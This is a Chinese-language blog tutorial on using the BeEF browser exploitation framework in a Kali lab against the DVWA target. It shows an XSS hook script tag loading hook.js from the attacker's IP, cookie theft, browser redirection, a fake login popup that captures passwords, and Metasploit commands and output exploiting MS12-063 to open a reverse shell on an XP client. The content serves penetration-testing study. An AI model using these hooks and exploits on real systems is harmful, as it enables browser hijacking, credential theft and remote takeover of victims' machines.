0x00 BeEF

BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。

不过在目前,BeEF使用的人比较少,并且在新版Kali中已经没有默认安装了,这里简单记录下BeEF的使用。


测试环境:任意存在XSS漏洞的站点及kali2019

注意如果是在新版kali中则可以使用apt-get install beef-xss进行安装。


0x02 BeEF的使用

直接在命令行输入xss-beef即可使用,我这里多了一个提示,需要改变缺省密码,它的缺省密码是beef/beef

当程序启动完毕后,会自动打开浏览器,出现登陆界面。

当然也可以根据之前的Log信息进行操作,上面也有写登陆的地址,直接登陆这个地址也是可以的。

接下来,将上面的Hook打入到XSS漏洞环境中,这里要记得将<IP>换成kali的IP地址,这里拿都知道的DVWA靶场举例。

<script src="http://192.168.181.141:3000/hook.js"></script>

直接插进去就行了。

然后登陆beef查看上线主机。

点击上线主机后,可以看到一些对应的信息。

点击command可以看到支持的攻击模块

这里由于软件有较久没有更新模块内容,所以有些功能可能无法使用的,可以通过命令前面的颜色来判断

  • 绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
  • 橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
  • 灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
  • 红色:命令模块不适用于此目标

这里拿Browser举例。

使用绿色的Get Cookie

点击Execute可以看到对应的信息

再拿橙色的Redirect Browser举例

点击Execute后用户界面会跳转到百度。

显示命令执行成功,查看客户端页面。

已经跳转成功,还可以使用社工模块中的弹窗等。

别说,还挺像的。。

输入后,可以在后台收到用户名密码信息

另外BeEF还可以联动MSF一起使用,不过具体功能还得大家自行研究了,这里贴下联动的方法。


0x03 MSF+BeEF

首先更改BeEF的第一个配置文件,开启MSF的加载模块。

vim /usr/share/beef-xss/config.yaml


另外需要修改扩展模块中的MSF配置文件

vim /usr/share/beef-xss/extensions/metasploit/config.yaml


保证红框内的配置即可,接着进MSF加载模块

load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123

这里区分大小写,密码在刚刚的配置文件里面有

最后一步,去beef-xss目录下通过./xss-beef启动才行。

cd /usr/share/beef-xss/
./beef


再次登陆BeEF就可以看到已经加载了MSF模块了。

这里就可以通过加载好的msf模块直接打了,不过找了一圈也没看到可以直接利用的。。。这大概就是不香了的原因吧,最后换个机器xp玩一下。


0x04 MSF+BeEF实例

MSF使用MS12-063漏洞,配合BeEF完成getshell

由于MS12-063针对IE7/8/9有效果,这里客户机用XP测试,哎,用这么老的机器测试就是玩。

XP访问存储型XSS上线至BeEF

接着选择msf模块中的ms12-063命令模块,填入对应的payload

直接执行,本以为完事了,结果。。。

一直loadingshell拿到,没办法只能去msf中玩了。

#后来想了下也测试过了,其实这里还是去`rediresct brower`那里去控制客户端访问一次生成的页面就可以了。
#比如这里需要让他访问http://192.168.181.141:8888,才能正常上线
#而且正常上线后,这个地方还是会loading,也得去msf中才能看到shell,感觉没啥意义。。。
msf6 > search ms12-063Matching Modules
================#  Name                                        Disclosure Date  Rank  Check  Description-  ----                                        ---------------  ----  -----  -----------0  exploit/windows/browser/ie_execcommand_uaf  2012-09-14       good  No     MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

接着进入模块后进行设置

msf6 > use exploit/windows/browser/ie_execcommand_uaf
msf6 exploit(windows/browser/ie_execcommand_uaf) >  set uripath /
uripath => /
msf6 exploit(windows/browser/ie_execcommand_uaf) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.181.141:4445
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.181.141:8080/
[*] Server started.

接着在BeEF中使用Redirect Brower功能让客户机访问http://192.168.181.141:8080/

再去看MSF,就上线了。


0x05 闲语

没想到上周临时的想法试着去申请下博客专家,今天就收到消息,来了来了,CSDN认证博客专家,GOT it,新的开始,继续加油!

Kali BeEF MSF的使用相关推荐

  1. 使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell

    利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.11 ...

  2. kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

    kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...

  3. 利用kali的msf提取汇编机器码(shellcode)

    对于提取小段汇编的机器码,kali的msf提取汇编机器码非常方便 比如提取下面小段的汇编机器码 push 5 ;5=SW_SHOWpush eaxmov eax,0x755bdab0call eax ...

  4. Kali利用MSF入侵安卓手机

    kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

  5. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  6. kali使用msf简单制作木马

    命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 ...

  7. Kali利用msf对MS10_061漏洞进行渗透测试

    注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...

  8. kali利用MSF对ms17_010漏洞入侵win7

    步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...

  9. kali利用MSF对永恒之蓝漏洞入侵windows7

    warning 本文目的并不是教会学者入侵win7主机, 而是加强防范 kali入侵win7 步骤一:实验环境的搭建 攻击机:kali(2022.3版本) 靶机:win7 专业版 sp1 x64位 安 ...

  10. Kali之MSF的MS08-067漏洞复现详解

    1.MSF初识: MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集.漏洞扫描.漏洞利用以及提权等功能的工具. 目前安装的kali都自带MSF,可以直接在图形界 ...

最新文章

  1. 并查集 ---- 扩展域并查集判二分图 + 循环模拟字典树 The 2020 ICPC Asia Macau Regional Contest C. Club Assignment (详解)
  2. java之Thread.sleep(long)与object.wait()/object.wait(long)的区别及相关概念梳理(good)
  3. ASP.NET的状态管理
  4. python写扫雷脚本_Python自动扫雷实现方法
  5. BZOJ 3436 小K的农场 差分约束
  6. 面试官:为什么 HashMap 的加载因子是0.75?
  7. display:none;与visibility:hidden;的区别
  8. synchronized同步方法概述
  9. JAVA与DOM解析器基础 学习笔记
  10. flask request类
  11. tensorflow如何微调时如何只训练后两层_TensorFlow官方发布剪枝优化工具:参数减少80%,精度几乎不变...
  12. 好看的php表格样式,分享四个非常好看实用的CSS样式表格
  13. vue 商城浏览足迹_vue实现用户获取浏览记录功能
  14. matlab上一次计算结果影响,matlab运行结果跟手算结果不一致怎么办
  15. linux各种命令手册
  16. asa 防火墙拦截了https_Cisco ASA防火墙的URL过滤控制
  17. 《Python数据结构与算法分析》第一章课后习题
  18. SPSS22 安装后不可用 没有出现授权 不显示工具栏
  19. v-model原理总结
  20. 如何使用m3u8格式下载快手直播回放的视频?自动转换MP4

热门文章

  1. heka 介绍,以及编译,备忘
  2. echarts结合amap (echarts-extension-amap)
  3. Convex Clustering(凸聚类)
  4. 金蝶KIS迷你版标准版备份助手V2.0
  5. python爬取拉勾网_python 爬取拉勾网实战
  6. 这些一夜爆火的国产软件,却一度被大众误以为是外国佬研发的。。。
  7. 活跃用户怎么理解?活跃用户的数据怎么看?
  8. TCP MIN_RTO 辩证考
  9. 从数据流角度管窥 Moya 的实现(二):处理响应
  10. 合并空间和时间姿势估算